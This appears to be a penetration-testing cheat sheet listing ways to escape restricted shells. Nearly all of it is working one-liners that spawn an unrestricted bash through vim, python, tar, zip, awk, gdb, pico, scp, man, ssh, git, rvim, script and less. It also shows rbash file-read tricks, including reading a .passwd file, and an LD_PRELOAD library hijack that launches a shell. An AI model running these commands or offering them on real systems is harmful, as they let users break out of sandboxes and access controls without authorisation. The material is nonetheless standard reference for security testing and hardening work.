
Escaping restricted shells

```bash tab="vim"
vim --cmd "set shell=/bin/bash" --cmd "shell"

```python tab="python"
python -c 'import pty; pty.spawn("/bin/bash")'

python -c 'import os; os.system("/bin/bash")'

```bash tab="tar"
tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

```bash tab="zip"
zip $(mktemp -u) /etc/hosts -T --unzip-command="bash #"

zip $(mktemp -u) /etc/hosts -T -TT "bash #"

### note: -TT is the short form of --unzip-command

```bash tab="awk"
awk 'BEGIN {system("/bin/bash")}'

```bash tab="gdb"
gdb -q -nx -ex '!bash' -ex quit

```bash tab="pico"
pico -s "/bin/bash"

type /bin/bash into the buffer, then press CTRL + T (CTRL + T runs the spell-check program set with -s)

TF=$(mktemp); echo 'exec bash'>$TF; chmod 777 $TF; pico -s $TF /etc/hosts

then press CTRL + T immediately

```bash tab="scp"
TF=$(mktemp); echo 'bash 0<&2 1>&2' > $TF; chmod 777 "$TF"; scp -S $TF x y:

### or, if a script.sh containing `bash 0<&2 1>&2` already exists:
scp -S script.sh x y:

``` tab="man"
man man

then type !/bin/bash and press Enter

TF=$(mktemp); echo '/bin/bash >&2 0>&2'>$TF; chmod 777 $TF; man --pager=/bin/bash $TF

echo "bash 0<&2 1>&2" > script.sh

man --pager=/bin/bash script.sh

```bash tab="ssh"
TF=$(mktemp); echo 'bash 0<&2 1>&2' > $TF; chmod 777 $TF; ssh -o ProxyCommand=$TF 127.0.0.1

### echo "bash 0<&2 1>&2" > script.sh
ssh -o ProxyCommand=script.sh 127.0.0.1

```bash tab="git"
git help status

then type !/bin/bash and press Enter

TF=$(mktemp); echo 'bash 0<&2 1>&2' > $TF; chmod 777 $TF; git -c core.pager=$TF --paginate help

echo "bash 0<&2 1>&2" > script.sh

git -c core.pager=script.sh --paginate help

```bash tab="rvim"
rvim
## then type `:python import os; os.system("/bin/bash")` and press Enter

TF=$(mktemp); echo "import os;os.system('bash')" > $TF; chmod 777 $TF; rvim -c "pyfile $TF"

### echo "import os;os.system('bash')" > script.py
rvim -c "pyfile script.py"

```bash tab="script"
script -c /bin/bash /dev/null

```bash tab="mapfile (Read Files)"
### Useful when rbash forbids cd and "/" in command names: mapfile is a shell builtin, and input redirection is not among rbash's restrictions
mapfile -t < /PATH/TO/FILE; printf "%s\n" "${MAPFILE[@]}"
mapfile foo < /PATH/TO/FILE; printf "%s" "${foo[@]}"

## reference: https://www.computerhope.com/unix/bash/mapfile.htm

```bash tab="process substitution"

Read a file without running an external command (`$(<file)` is bash's command-substitution shortcut for `$(cat file)`; the tab name "process substitution" is a misnomer):

echo $(<../.passwd)

```bash tab="LD_PRELOAD"
## Build a shared library that overrides a libc function and load it via LD_PRELOAD.
## This example overrides usleep(), identified with objdump on the target binary.
## Note: in secure-execution mode (set-user-ID/set-group-ID binaries) the dynamic loader ignores LD_PRELOAD paths containing a slash, so this applies only to ordinary binaries.


## script.c

#include <stdio.h>
#include <stdlib.h>
void usleep() {
unsetenv("LD_PRELOAD");
system("echo ok! && /bin/bash");
exit(0);
}

chmod 777 script.c
gcc -shared script.c -o script
chmod 777 script

declare -x LD_PRELOAD=/PATH/TO/script

```bash tab="less"

From `less --help`:

!command        Execute the shell command with $SHELL.
|Xcommand       Pipe file between current pos & mark X to shell command.

1) simply type: !/bin/bash

2) set a mark with `ma`, then type `|aCOMMAND`

(the `|a` prefix is displayed as `!` as you type)

```